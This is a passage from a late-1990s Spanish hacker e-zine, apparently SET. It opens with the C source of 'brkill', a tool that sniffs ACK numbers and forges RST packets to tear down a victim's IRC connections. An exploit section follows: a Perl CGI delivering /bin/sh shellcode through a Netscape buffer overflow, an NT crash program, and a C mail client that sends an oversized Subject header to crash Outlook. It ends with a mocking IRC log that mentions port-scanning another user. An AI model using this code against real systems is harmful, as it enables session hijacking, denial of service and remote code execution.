struct bpf_program fcode; u_int localnet, netmask; char errbuf[PCAP_ERRBUF_SIZE]; char dialup[] = "ppp0"; psize = 300; if (device == NULL) { if ((device = pcap_lookupdev (errbuf)) == NULL) { printf ("pcap_lookupdev : %s\n", errbuf); exit (-1); } } printf ("Selected network device: %s\n", device); if (!strcmp (device, dialup)) { link_offset = 0; } if ((pfd = pcap_open_live (device, psize, IFF_PROMISC, TIMEOUT_VALUE, errbuf)) == NULL) { printf ("pcap_open_live : %s\n", errbuf); exit (-1); } if (pcap_lookupnet (device, &localnet, &netmask, errbuf) < 0) { printf ("pcap_lookupnet : %s\n", errbuf); exit (-1); } snprintf (cmd, sizeof (cmd), filter_str); printf ("Setting filter : %s\n", filter_str); if (pcap_compile (pfd, &fcode, cmd, IFF_PROMISC, netmask) < 0) { printf ("pcap_compile : %s\n", pcap_geterr (pfd)); exit (-1); } if (pcap_setfilter (pfd, &fcode) < 0) { printf ("pcap_setfilter : %s\n", pcap_geterr (pfd)); exit (-1); } if (pcap_datalink (pfd) < 0) { printf ("pcap_datalink : %s\n", pcap_geterr (pfd)); exit (-1); } } u_long extract_ack (char *pkt) { u_long extracted; u_long last_ack = 0; bcopy ((u_long *) (pkt + 28), &extracted, sizeof (u_long)); last_ack = ntohl (extracted); if (last_ack == 0) { puts ("This machine returns a last ACK of 0. Cannot reset."); exit (-1); } printf ("Last ACK # sent by the victim is %lu (%#lx).\n", last_ack, last_ack); return (last_ack); } u_long grab_pcap () { char *pptr = NULL; u_long last_ack; while ((pptr = (char *) pcap_next (pfd, &hdr)) == NULL); pptr = pptr + link_offset; last_ack = extract_ack (pptr); return (last_ack); } void init_pkt (u_long dest, u_long src, u_short port) { size_t pktlen; pktlen = sizeof (struct ip) + sizeof (struct tcphdr); bzero (&pkt, 40); bzero (&pseudo, 32); pkt.iphdr.ip_hl = 0x5; pkt.iphdr.ip_v = IPVERSION; pkt.iphdr.ip_tos = 0x0; pkt.iphdr.ip_len = pktlen; pkt.iphdr.ip_id = htons (0x29a + (u_short) rand () % 7000); pkt.iphdr.ip_off = BSDFIX (IP_DF); pkt.iphdr.ip_ttl = 255; pkt.iphdr.ip_p = IPPROTO_TCP; pkt.iphdr.ip_src.s_addr = src; pkt.iphdr.ip_dst.s_addr = dest; pkt.iphdr.ip_sum = htons (tcp_cksum ((u_short *) & pkt.iphdr, 20)); pkt.tcphead.th_sport = htons (rand () % 5000 + 1024); pkt.tcphead.th_dport = htons (port); pkt.tcphead.th_seq = 0; pkt.tcphead.th_ack = 0; pkt.tcphead.th_x2 = 0; pkt.tcphead.th_off = 0x5; pkt.tcphead.th_flags = TH_ACK + TH_PUSH; /* Use user-supplied argument */ pkt.tcphead.th_win = htons (0x800); pkt.tcphead.th_urp = 0; /* Now init the pseudoheader we need to calculate the TCP checksum */ pseudo.saddr = src; pseudo.daddr = dest; pseudo.zero = 0; pseudo.proto = IPPROTO_TCP; pseudo.len = htons (0x14); /* Refers to ONLY the TCP header plus any options */ bcopy (&pkt.tcphead, &pseudo.faketcp, 20); pkt.tcphead.th_sum = tcp_cksum ((u_short *) & pseudo, 32); } int open_sock () /* Open up a socket and return the resulting file descriptor. */ { int sockfd; const int bs = 1; if ((sockfd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) { perror ("open_sock():socket()"); exit (-1); } if (setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, (char *) &bs, sizeof (bs)) < 0) { perror ("open_sock():setsockopt()"); close (sockfd); exit (-1); } return (sockfd); } struct sockaddr_in * set_sockaddr (u_long daddr, u_short port) /* Set up target socket address and return pointer to sockaddr_in structure. */ { struct sockaddr_in *dest_sockaddr; dest_sockaddr = (struct sockaddr_in *) malloc (sizeof (struct sockaddr_in)); bzero (dest_sockaddr, sizeof (struct sockaddr_in)); dest_sockaddr->sin_family = AF_INET; dest_sockaddr->sin_port = htons (port); dest_sockaddr->sin_addr.s_addr = daddr; return (dest_sockaddr); } u_long host_to_ip (char *host_name) { struct hostent *target; u_long *resolved_ip; resolved_ip = (u_long *) malloc (sizeof (u_long)); if ((target = gethostbyname (host_name)) == NULL) { fprintf (stderr, "host_to_ip: %d\n", h_errno); exit (-1); } else { bcopy (target->h_addr, resolved_ip, sizeof (struct in_addr)); return ((u_long) * resolved_ip); } } char * set_filter (char *destip, char *srcip, char *dport) { static char *filt; filt = (char *) malloc (strlen (destip) + strlen (srcip) + strlen (dport) + 39); filt[0] = '\0'; strcat (filt, "src host "); strcat (filt, destip); strcat (filt, " and dst host "); strcat (filt, srcip); strcat (filt, " and src port "); strcat (filt, dport); return (filt); } u_long get_ack (u_long victim, u_long saddr, u_short port, int fd, struct sockaddr_in * sock, int delay) { size_t psize; u_long last_ack; psize = sizeof (struct evilpkt); init_pkt (victim, saddr, port); sleep (delay); if (sendto (fd, (const void *) &pkt, psize, 0, (const struct sockaddr *) sock, sizeof (struct sockaddr)) < 0) { perror ("sendto()"); close (fd); exit (-1); } last_ack = grab_pcap (); return (last_ack); } void usage () { puts ("brkill - by basement research, 9/30/98\n"); puts ("Usage: brkill [-d device] [-s source IP addr]"); puts ("\t [-t time to pause between get_acks (default=1 sec)]"); puts ("\t [-l server low port or single port if not using range (default=6660)]"); puts ("\t [-h server high port or single port if not using range (default=6670)]"); puts ("\t [-v # of victim ports to target (starting at 1023, default=50)]"); puts ("\t [-n # of times to increment seq # by 1 for each port combo (default=0)]"); puts ("\t <victim addr> <victim's server> <dest port for ack retrieval>"); exit (0); } int main (int argc, char **argv) { int fd, i, sp, opt, delay = 1, vichighport, vicports = 50, highseq = 0; u_short ircport, slowport = 0, shighport = 0; char *source = NULL; struct sockaddr_in *sock; u_long saddr, server; size_t psize; register u_long last_ack; struct hostent *hptr; struct utsname localname; if ((argc > 18) || (argc < 4)) { usage (); } while ((opt = getopt (argc, argv, "d:s:t:l:h:v:n:")) != -1) { switch (opt) { case 'd': device = optarg; break; case 's': source = optarg; saddr = host_to_ip (source); break; case 'p': delay = atoi (optarg); break; case 'l': slowport = atoi (optarg); break; case 'h': shighport = atoi (optarg); break; case 'v': vicports = atoi (optarg); break; case 'n': highseq = atoi (optarg); break; case '?': puts ("Unknown option."); exit (-1); } } /* Try to determine source IP address if its not provided */ if (source == NULL) { if (uname (&localname) < 0) { perror ("uname(): "); exit (-1); } if ((hptr = gethostbyname (localname.nodename)) == NULL) { perror ("gethostbyname(): "); exit (-1); } source = hptr->h_name; bcopy (hptr->h_addr, &saddr, sizeof (struct in_addr)); printf ("Using a source address of %s\n", inet_ntoa (saddr)); } /* These next two if conditionals deal with the situation where only -l or * -h are specified. In these cases, we will only target the specified port. */ if ((slowport > 0) && (shighport == 0)) { shighport = slowport; } if ((shighport > 0) && (slowport == 0)) { slowport = shighport; } /* If the low server port is bigger than the high server port, then the user * doesn't know what they are doing. In this case, we'll swap the values. */ if (slowport > shighport) { SWAP (slowport, shighport); puts ("Warning: low port is greater than high port - swapping the two..."); } /* Defaults if neither -l nor -h are specified (common IRC server ports). */ if ((slowport == 0) && (shighport == 0)) { slowport = 6660; shighport = 6670; } /* End of the options processing code */ vichighport = VICTIM_START_PORT + vicports; ircport = shighport; filter_str = set_filter (argv[optind], source, argv[optind + 2]); victim = host_to_ip (argv[optind]); server = host_to_ip (argv[optind + 1]); port = (u_short) atoi (argv[optind + 2]); sock = set_sockaddr (victim, port); fd = open_sock (); psize = sizeof (struct evilpkt); start_pcap (); while (1) { last_ack = get_ack (victim, saddr, port, fd, sock, delay); pkt.iphdr.ip_src.s_addr = server; pkt.iphdr.ip_dst.s_addr = victim; pkt.iphdr.ip_id = htons (rand () % 7000); pkt.iphdr.ip_off = 0; pkt.tcphead.th_flags = TH_RST; pkt.tcphead.th_win = 0; pkt.tcphead.th_ack = 0; pseudo.saddr = server; pseudo.daddr = victim; if (ircport >= slowport) { pkt.tcphead.th_sport = htons (ircport); } else { ircport = shighport; pkt.tcphead.th_sport = htons (ircport); } printf ("Setting the source port to %d.\n", ircport); ircport--; for (i = 0; i <= highseq; i++) { pkt.tcphead.th_seq = htonl (last_ack + i); bcopy (&pkt.tcphead, &pseudo.faketcp, 20); for (sp = VICTIM_START_PORT; sp < vichighport; sp++) { /* FreeBSD has problems and runs out of buffer space in sendto() unless we insert a delay here. Unfoprtunately, this makes the code less effective. */ #ifdef __FreeBSD__ if (!(sp % 20)) { usleep (20000); } #endif pkt.tcphead.th_dport = htons (sp); bcopy (&pkt.tcphead.th_dport, &pseudo.faketcp.th_dport, 2); pkt.iphdr.ip_id = htons (0x29a + (u_short) rand () % 7000); pkt.iphdr.ip_sum = 0; pkt.iphdr.ip_sum = htons (tcp_cksum ((u_short *) & pkt.iphdr, 20)); pseudo.faketcp.th_sum = 0; pkt.tcphead.th_sum = tcp_cksum ((u_short *) & pseudo, 32); if (sendto (fd, (const void *) &pkt, psize, 0, (const struct sockaddr *) sock, sizeof (struct sockaddr)) < 0) { perror ("sendto(): "); close (fd); exit (-1); } } } } if (close (fd) == -1) { perror ("close()"); exit (-1); } return (0); } -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Netscape en x86 Linux Objetivo: Buffer overflow Parche: Cuidado con lo que ves Creditos: Mr. Nothing <nothing@shout.net> Descripcion: El buffer overflow puede ser activado remotamente por el CGI. Codigo: #!/usr/bin/perl # # buffer-overflow-1.cgi -- Dan Brumleve, 1998.10.19 sub parse { join("", map { /^[0-9A-Fa-f]{2}$/ ? pack("c", hex($_)) : "" } @_); } # This is very tricky business. Netscape maps unprintable characters # (0x80 - 0x90 and probably others) to 0x3f ("?"), so the machine # code must be free of these characters. This makes it impossible # to call int 0x80, so I put int 0x40 there and wrote code to # shift those bytes left before it gets called. Also null characters # can't be used because of C string conventions. # the first paragraph of the following turns the int 0x40 in the second # paragraph into int 0x80. the second paragraph nullifies the SIGALRM # handler. my $pre = parse qw{ 31 c0 # xorl %eax,%eax 66 b8 ff 0f # movw $0x1056,%ax 01 c4 # addl %eax,%esp c0 24 24 01 # shlb $1,(%esp) 29 c4 # subl %eax,%esp 31 c0 b0 30 31 db b3 0e 31 c9 b1 01 cd 40 }; my $code = $pre . parse qw{ b0 55 # movb $0x55,%al (marker) eb 58 # (jump below) 5e # popl %esi 56 # pushl %esi 5b # popl %ebx 43 43 43 43 43 43 43 43 43 43 43 # addl $0xb,%ebx 21 33 # andl %esi,(%ebx) 09 33 # orl %esi,(%ebx) 31 c0 # xorl %eax,%eax 66 b8 56 10 # movw $0x1056,%ax 01 c4 # addl %eax,%esp c0 24 24 01 # shlb $1,(%esp) 33 c0 # xorl %eax,%eax b0 05 # movb $5,%al 01 c4 # addl %eax,%esp c0 24 24 01 # shlb $1,(%esp) 29 c4 # subl %eax,%esp 66 b8 56 10 # movw $0x1056,%ax 29 c4 # subl %eax,%esp 31 d2 # xorl %edx,%edx 21 56 07 # andl %edx,0x7(%esi) 21 56 0f # andl %edx,0xf(%esi) b8 1b 56 34 12 # movl $0x1234561b,%eax 35 10 56 34 12 # xorl $0x12345610,%eax 21 d9 # andl %ebx,%ecx 09 d9 # orl %ebx,%ecx 4b 4b 4b 4b 4b 4b 4b 4b 4b 4b 4b # subl $0xb,%ebx cd 40 # int $0x80 31 c0 # xorl %eax,%eax 40 # incl %eax cd 40 # int $0x80 e8 a3 ff ff ff # (call above) }; $code .= "/bin/sh"; my $transmission = parse qw{ 6f 63 65 61 6e 20 64 65 73 65 72 74 20 69 72 6f 6e # inguz 20 66 65 72 74 69 6c 69 7a 61 74 69 6f 6e 20 70 68 # inguz 79 74 6f 70 6c 61 6e 6b 74 6f 6e 20 62 6c 6f 6f 6d # inguz 20 67 61 74 65 73 20 73 6f 76 65 72 65 69 67 6e 74 # inguz 79 }; my $nop = "\x90"; # this actually gets mapped onto 0x3f, but it doesn't seem # to matter my $address = "\x10\xdb\xff\xbf"; # wild guess, intended to be somewhere # in the chunk of nops. works on every # linux box i've tried it on so far. my $len = 0x1000 - length($pre); my $exploit = ($nop x 1138) . ($address x 3) . ($nop x $len) . $code; # the first $address is in the string replaces another # pointer in the same function which gets dereferenced # after the buffer is overflowed. there must be a valid # address there or it will segfault early. print <<EOF; Content-type: text/html <!-- $transmission --> <embed type="$exploit" src="data:x"> EOF -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Windows NT Objetivo: Crash Nt Parche: Aun se lo estan pensando Creditos: fill <fill@TCHERCOM.RU> Descripcion: Este programa resetea un Nt con SP4 RC Codigo: #include <windows.h> int WINAPI WinMain(HINSTANCE hinstExe, HINSTANCE hinstPrev, LPSTR lpszCmdLine, int nCmdShow) { HMENU hMenu = CreatePopupMenu(); HMENU hMenu1 = CreatePopupMenu(); AppendMenu(hMenu1,MF_STRING, 1, "1"); AppendMenu(hMenu1,MF_STRING, 2, "2"); AppendMenu(hMenu1,MF_STRING, 3, "3"); InsertMenu(hMenu,1,MF_POPUP|MF_STRING,(UINT)hMenu1,"1"); InsertMenu(hMenu,2,MF_POPUP|MF_STRING,(UINT)hMenu1,"2"); InsertMenu(hMenu,3,MF_POPUP|MF_STRING,(UINT)hMenu1,"3"); InsertMenu(hMenu,4,MF_POPUP|MF_STRING,(UINT)hMenu1,"4"); InsertMenu(hMenu,5,MF_POPUP|MF_STRING,(UINT)hMenu1,"5"); InsertMenu(hMenu,6,MF_POPUP|MF_STRING,(UINT)hMenu1,"6"); return 0; } -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Internet Explorer 4 Objetivo: Fallo de seguridad, obtener ficheros de un navegador. Parche: http://www.microsoft.com/security/bulletins/ms98-015.asp Para los que no tengan el parche: a) Activar el aviso para cuando se transmiten formularios no cifrados, ya que indicaria al usuario que se pretende enviar un fichero. b) Desactivar la ejecucion de guiones para la zona de seguridad de Internet. Ambas opciones se pueden configurar en Edicion --> Opciones de Internet --> Seguridad --> Configuracion... La primera de ellas, en "Miscelanea", desactivando la opcion "Enviar los datos no encriptados del formulario". La segunda, en "Automatizacion", desactivando la opcion "Automatizacion activa". Creditos: Juan Carlos Garcia Cuartango <cuartangojc@mx3.redestb.es> Descripcion: Pues eso que este fallo se aprovecha de la manera en que IE gestiona las operaciones de cortar y pegar a traves de guiones. El agujero permite a un atacante pegar el nombre de un fichero en el control de carga de ficheros (control que teoricamente solo el usuario esta autorizado a rellenar manualmente) para posterior mente enviarselo de vuelta al atacante. Codigo: - -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Microsoft Outlook Objetivo: Denial Of Service Parche: EL mismo que el de Cuartango Creditos: rockme@altern.org Descripcion: Cuando Microsoft Outlook lee el subject de un e-mail lo aloja con un tamaño de aproximadamente 5000 caracteres y no comprueba el tamaño del subject recibido. Este programa hace que windows se estrelle. Es posible ejecutar comandos, solo debes modificar el codigo. Codigo: #include <stdio.h> #include <strings.h> #include <errno.h> #include <signal.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> struct in_addr resolv(char *name) { static struct in_addr in; unsigned long l; struct hostent *ent; if((l = inet_addr (name)) != INADDR_NONE) { in.s_addr = l; return in; } if(!(ent = gethostbyname (name))) { in.s_addr = INADDR_NONE; return in; } return *(struct in_addr *) ent->h_addr; } char buf[70000]; char server[5000]; char mailfrom[5000]; char rcptto[5000]; main (int argc, char *argv[]) { struct sockaddr_in addr; int i, s; char c; int port=25; if(argc < 3){ printf("\n Usage : %s mail_server sender recipient \n\n", argv[0]); printf(" Warning this program do not spoof your IP adress !\n\n"); exit(0); } if(strlen(argv[1]) > 4990){ printf("Sorry mailserver is too big .\n"); exit(0); } if(strlen(argv[2]) > 4990){ printf("Sorry sender is too big .\n"); exit(0); } if(strlen(argv[3]) > 4990){ printf("Sorry recipient is too big .\n"); exit(0); } /* Mwarf, my program is protected from buffer overflow attacks :) */ printf("\nRockme Security Research Laboratory !\n\n\n"); printf("Microsoft Outlook Denial of Service !\n"); printf("Veuillez patienter environ 20 secondes suivant la vitesse du serveur ...\n"); sprintf(server, "HELO %s\n", argv[1]); sprintf(mailfrom, "MAIL FROM: %s\n", argv[2]); sprintf(rcptto, "RCPT TO: %s\n", argv[3]); s = socket(AF_INET, SOCK_STREAM, 0); addr.sin_family = AF_INET; addr.sin_addr = resolv(argv[1]); addr.sin_port = htons(port); connect(s, (struct sockaddr *) &addr, sizeof (addr)); write(s, server, strlen(server)); sleep(1); write(s, mailfrom, strlen(mailfrom)); sleep(1); write(s, rcptto, strlen(rcptto)); sleep(1); write(s, "data\n", 5); sleep(1); write(s, "Subject : ", 10); sleep(1); for(i = 1; i < 7000; i++){ write(s, "X", 1); } sleep(3); write(s, "\n", 1); sleep(1); write(s, "bonjour\n", 8); sleep(1); write(s, ".\n", 2); sleep(1); write(s, "quit\n", 5); sleep(1); read(s, buf, 69000); /* read (s, &c, 1); */ printf("%s", buf); printf("\n"); } -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Cisco routers Objetivo: Buffer overflow Parche: Pendiente de salir Creditos: - Descripcion: Al crearse un desbordamiento de buffer, los fragmentos de texto escritos antes por los usuarios se pueden conocer, ironicamente los sitios con una buena politica de contraseñas son los mas vulnerables, ya que si obligan a cambiar cada poco las claves de sus usuarios, es mas probable que en estos fragmentos podrian encontrarse contraseñas. No se necesita tener una cuenta solo conectarse al dispositivo adecuado y escribir la sucesion apropiada de caracteres. Codigo: - -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Remailer de iname.com Objetivo: Saber la direccion del redireccionamiento Parche: Respuesta de iname.com: We are currently aware of the problem you experienced and are currently working to resolve it. The "user-unknown" bounces your senders have experienced appear to be sporadic. Our Technology team is currently working to address this issue. We sincerely apologize for the inconvenience caused by this problem. Creditos: Senpai <senpai@cyberdude.com> Descripcion: El fallo descubierto por Senpai, miembro de RareGazZ permite averiguar la direccion a donde se realiza el forward, puede llegar a descubrirse la direccion original (a donde redirecciona si se le envia un mail a su remailer e iname no puede acceder a acceder a la direccion que aparece en el forward de iname devuelve el mail al que lo envio, pero con un pequeño fallo, indica cual es la direccion a la que no pudo acceder. Codigo: - -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Historias del IRC (segunda parte) - GuyBrush ]───────────────────────────── Algunos os preguntareis ... porque es la segunda parte? donde esta la primera? La pimera parte de esta cruda realidad la teneis en el numero 16 de SET ... Un buen dia andaba yo por el IRC chateando con algunos amigos en canales no de hack cuando pense en darme una vuelta por #hackers a ver que se cocia por alli. Asi que le pedi a mi amigo ufo la contraseña y entre a dotorear un poco. Cual fue mi sorpresa cuando, a pesar de que usaba otro nick, se enteraron de quien era ... logicamente, se lo dijo ufo porque con lo paleto que es nuestro protagonista de hoy ... Pues aqui teneis casi todo el log. Podeis sacar vuestras propias conclusiones ... (por cierto, mi nick era q1234) Session Start: Mon Nov 23 00:22:13 1998 *** Now talking in #hackers *** Topic is '[~AZZ~] -> Ahora seras auto opeado cuando entres por mi rekto.' *** Set by Nardo on Mon Nov 23 00:13:06 *** ufo sets mode: +oo q1234 LoLo <Cuasl> q1234 tu eres GuyBrush? <q1234> thx por decirlo en el canal <Cuasl> q1234 por? <Cuasl> q1234 no kieres ke se enteren de lo lamer ke eres? <l0b0> :???????? <q1234> quieres pelea ? pues buscate a otro ... <Cuasl> q1234 pelea? yohe dishopelea? <jla> ?┐ <jIa> q1234: porke no te largas enpanao? [ Comentario: Que conversacion tan interesante !!! cuanta cultura !!! que cosas que se aprenden en el IRC !!! ] <MuErTe> ? <jla> joe cuasi <ufo> JLA <ufo> jla <jla> tu? <ufo> shhh - entra ufete (2ufo@rs161.readysoft.es4) - Clones (ufo, ufete )6 rs161.readysoft.es 4[124] *** MuErTe sets mode: +o ufete - sale ufete 2(4ufo@rs161.readysoft.es2) <jla> almenos dejadme dicirlo ami <ufo> el que? <jla> lo que he dicho antes <ufo> que has dixo antes? <LoLo> wenn <jla> io que se esto habla solo i to :) <jIa> aparte de ke he disho ke se largue el empanao del GuyBrush <jIa> nada mas *** ufo is now known as ud *** ud has quit IRC (-=|=- No tomes drogas.....usa tu propia quimika...-=|=-) <jla> sera el megahal que ia habra aprndido a rajar el solo <q1234> largate tu gilipollas - entra - ufo -(ufo@rs161.readysoft.es) <q1234> que coño te he hecho yo? <jla> q1234 con el tiempo te daras cuenta de que todo es relativo mas aqui <q1234> de que me hablas? <jIa> akaso el ke seas feo no es una buena razon pa ke te largues? <q1234> dime antes que te hecho? <ufo> llevas aqui un par de dias y ya tas hechando gente? <ufo> esperate un pokito no? <jIa> no hecho a nadie , solo insulto a los lamers komo el Guy. <ufo> lamers? <ufo> el Guy lleva aqui mas de un año... [ pero ufo ... como le hablas de numeros al chaval? si no sabe contar!!! ] <jla> joe me dijeron que el linux erea mu inteligente peor no pense que tanto <jla> jia <jIa> q1234, peaso nick chorras ke tas puesto no? digno de anormales :P [ anda que el tuyo ... (que es MuErTe, como vereis despues) ] <jla> jIa <jla> joder entodavia me haceis cambiar de nick <Cuasl> veiz <q1234> muerte ... da la cara [ Dios mio !!!! cuanto sabe el tal MuErTe apestosa ese !!! si es capaz de meter dos clones y ponerles nombres parecidos a los del resto de usuarios !!! que gran jacker !!! de mayor quiero ser como el ... y lo que mas me impresiona es su nick ... impresionante ] <Cuasl> jeje <Cuasl> en linux se nota mas <MuErTe> xDD <Cuasl> pero en win no se nota na <MuErTe> anda kas tardao melon <MuErTe> xD <Hackelin> valla oztia <Cuasl> ke va muerte <Cuasl> ezke no me daba kuenta <MuErTe> tu no sunn <MuErTe> xD <Cuasl> de verdad ke ni me enterao <MuErTe> el Guy <Cuasl> ahh *** ufo sets mode: +n <MuErTe> xD <Cuasl> ya <Cuasl> XDD <Cuasl> fale *** Cuasl is now known as sunn <sunn> ya <sunn> :) <sunn> XDDDDDDDD *** ufo has quit IRC (-=|=- No tomes drogas.....usa tu propia quimika...-=|=-) <sunn> jeje <MuErTe> . <sunn> . ? <sunn> :P <sunn> paso un angel................................................ <sunn> X) <sunn> paso un ciclo.............................................. [ no!!! era un burro volando!!! ] <sunn> mejor dicho <sunn> XDDDD <sunn> XD <sunn> jeje *** Atic sets mode: +o Hackelin *** MuErTe changes topic to '[5m[49mhttp://www.ufoplanet.org/rc5 << See Now!![0m' <Atic> ui si esta HAckelin de la Vega ! <Atic> :* <Atic> xD <jla> joder <sunn> MuErTe: el topic ese me va a volver lokorrrrr !!!!! <sunn> xD <MuErTe> xD <sunn> jeje <MuErTe> /clear <MuErTe> xD <sunn> raya ke no veas <sunn> ya <sunn> :P <sunn> jeje <MuErTe> si kieres lo pongo verde fosforito <MuErTe> xD <sunn> sip <sunn> mola maz <sunn> jeje <sunn> XD <MuErTe> xD <MuErTe> pso a la prosima <MuErTe> xD <sunn> oka <sunn> :) <MuErTe> kara tendria ke modifiskar el script <MuErTe> y me da un palo del kopon <MuErTe> xD <sunn> aha <jla> script <MuErTe> mejor mato el tiempo leyendo los fabulosos Tectos de Seguridad informatica de PcActual <sunn> avΘ si me lo rlz <sunn> jeje <jla> ummm <sunn> los de Linux Actual rlz more <sunn> :) <MuErTe> nonononon <MuErTe> PC Actual <MuErTe> xD <MuErTe> mola mas <MuErTe> xD <sunn> guenonp <sunn> x) *** MuErTe sets mode: +o jla <MuErTe> xD <AciD-KrS> xDDD <MuErTe> sobretodo los testosto der guy <MuErTe> xD <MuErTe> sobretodo los testos der guy <MuErTe> xD <sunn> jeje <jla> agg dejemoslo <MuErTe> me tronsho kuando los leo <MuErTe> xD [ los lees ????? un 31337 como tu ??? no jodas!!!! que honor!!!! ... pense que solo leias el tele-indiscreta ... ] <sunn> en la de este mez ? <MuErTe> no sep <MuErTe> este mes no lu tengo [ no 'lu' tienes? ] <sunn> oka <MuErTe> xD - entra LoLo (2~LoLo@195.77.49.604) *** \W3nd|g0 sets mode: +o LoLo <LoLo> res <LoLo> th <LoLo> thx <MuErTe> xD <MuErTe> se lolo kampeon <MuErTe> xD <LoLo> -\W3nd|g0(IRcap.3@195.235.64.57)- Hola LoLo Bienvenido al canal. <LoLo> te creia mas formal <LoLo> xD <LoLo> [Nov 22 23:05:55 GMT] 5 RC5 blocks are in file buff-out.rc5 <MuErTe> muahua+ <MuErTe> xD <LoLo> campion , campion <LoLo> : P <MuErTe> xDD <MuErTe> HIP. HIP HURRA!!!!! par 75 der LoLO!! <MuErTe> ke ya pronto llega a los 1000!! *** AciD-KrS has quit IRC (samba Rlz!!!!!!!!) <LoLo> 75? <LoLo> komor? <MuErTe> HIP. HIP HURRA!!!!! par P - 75 der LoLO!! <LoLo> aaaaaaaapz <LoLo> XDDDDDD <MuErTe> xDD <LoLo> na, si hoi he mandao 68 blokes <LoLo> : P <LoLo> i tu puta, a ver si kompartes SGI XD <MuErTe> juer <MuErTe> xD <MuErTe> muahua <MuErTe> xd <MuErTe> si no tengu <MuErTe> 3 pedaso de shell ke tenia [ que tipico ... ] <MuErTe> ya se man jorobau [ repito ... QUE TIPICO ... ] <MuErTe> xD <MuErTe> normal <MuErTe> use los maravillosos testor der Guy , pa arreglarles la mashine <MuErTe> y han akabau metiendo win3.11 [ se ve que en el parbulario no le enseñan bien .... neeeeeene que no se dice mashine, que es maquina y acabado ... no akabau .. si es que nunca aprendera ... ] <\W3nd|g0> ? <\W3nd|g0> k hoy to dios se mete kon el Guy u k? <\W3nd|g0> XDDDDDDDDDDDD [ el 'guy' esta echando un vistazo por la maquina del Mofeta, digo, muerte ... anda!!! cuanto puerto abierto!!!! si no me caben por pantalla!!! jejejeje ... la gente piensa que usar linux es meterle el Bitchx y conectarse al IRC ... si es que nunca aprendera ... A ver a ver .... puerto 113, 21, 23 ... interesante ... echemos un vistazo a ese puerto 21 que lo veo un poco mal ... ] <MuErTe> xDDD <MuErTe> otro ke no sa koskao <MuErTe> xD <MuErTe> wendi <MuErTe> xD <MuErTe> kes el jIa y el Cuasl era yor <MuErTe> xD [ XDDDD que divertido!!!! como mola hacer el gilipollas!!! ale a regalar dinero a telefonica (o como diria el ... tim0f0nic@) haciendo el imbecil ] <jla> jla jIa joe con las x no se notaba... <MuErTe> yap <MuErTe> kon los Gⁿin tmpk se nota [ habra que plantearse el escribir algun articulo sobre como cambiar las 'l' por 'i' o por '1' para insultar a la gente sin dar la cara ... es lo mas!!! dominando eso y con una @ ... 31337 seguro!! ] <jla> que kpullo XDD <sunn> MuErTe: el bitchx tiene algun hole cuando ta rlz en x ? <MuErTe> kapuIIo? <MuErTe> ein? <MuErTe> traduseme illor , ke yo no tengo er nivel del Guy [ desde luego que no ... mas quisieras ... pues mira, lo que quiere decirte es que conectarte al IRC con el Bitchx desde las X de linux no es seguro (me sigues?) ... y menos si te conectas como superusuario (Mmmmm seguro que te has perdido ...) ] <MuErTe> y no se kosas desas [ lo se ... todo lo que no sea IRC, Clon, Ban o Kick ... ni idea, verdad? ] <jla> eh mande! - entra inf (2nACK-Ack@ppp145.198.redestb.es4) <LoLo> nas inf <inf> joer *** LoLo sets mode: +o inf <inf> lap <q1234> desde luego ... tu, todo lo que no sea IRC ... ni puta idea <inf> a ver... <sunn> el cliente de irc denominado BitchX tiene algun fallo en su integridad mientras este esta arrankado (ejecutandose) desde el entorno grafico denominado Xwindows ?????????????? <MuErTe> pff <MuErTe> xD <sunn> XDDD <sunn> ya ?? <inf> ande poneis la key q argun dia me voy a vorve loko <sunn> XDDDDD <inf> :? <inf> MUERRRRRRRRRTTTTTT <inf> XDDD <MuErTe> inffffff :)) <MuErTe> dios <MuErTe> kuanto tiemporl <sunn> jejejejeje <MuErTe> xDD <inf> mecagentoo [ se me saltan las lagrimas ... ] <sunn> MuErTe: ya ? <MuErTe> pos sunn <MuErTe> ke yo sepa, aparte de ke en una Xterm lo veras del kulo, ninguno <inf> [ MuErTe: ] como tamos ? <MuErTe> metete una ansi-xterm [ donde habra aprendido ese vocabulario? guau!!! lo que yo te diga .. 31337 al 100 por 100 !!! ] <MuErTe> y se arreglara un plin <MuErTe> inf : bien :) <MuErTe> y tu ke? <sunn> faler torpedor <sunn> :P <jla> reboot <MuErTe> bye jIa <MuErTe> xD <jla> joe <jla> /quit *** jla has quit IRC (BitchX-74p4+Deb1an -- just do it.) <sunn> ke alguien me hhaga un whois y lo pege <sunn> plisssss <MuErTe> yo eske vakas no me interesaban <MuErTe> xD <MuErTe> los pobres semos asin [ chaval tu no eres pobre ... eres analfabeto ... ] <MuErTe> xD <LoLo> | channels : @#opersá@#pepe #seguridad_informatica @#hackers <sunn> jejeje <sunn> joje <sunn> joe <MuErTe> ╓───────────────────────────────────────────────── ── ─ <MuErTe> ║ sunn (~sunn@ig-254.arrakis.es) [spain] <MuErTe> ║ (ircname) -=B0rN 70 B3 4W4y=- <MuErTe> ║ (channels) @#opersá@#pepe #seguridad_informatica @#hackers <MuErTe> ║ (server) pleyades.irc-hispano.org - Arrakis IRC Server <MuErTe> ╙───────────────────────────────────────────────── ── ─ <sunn> el fake join no rlz good pal linux 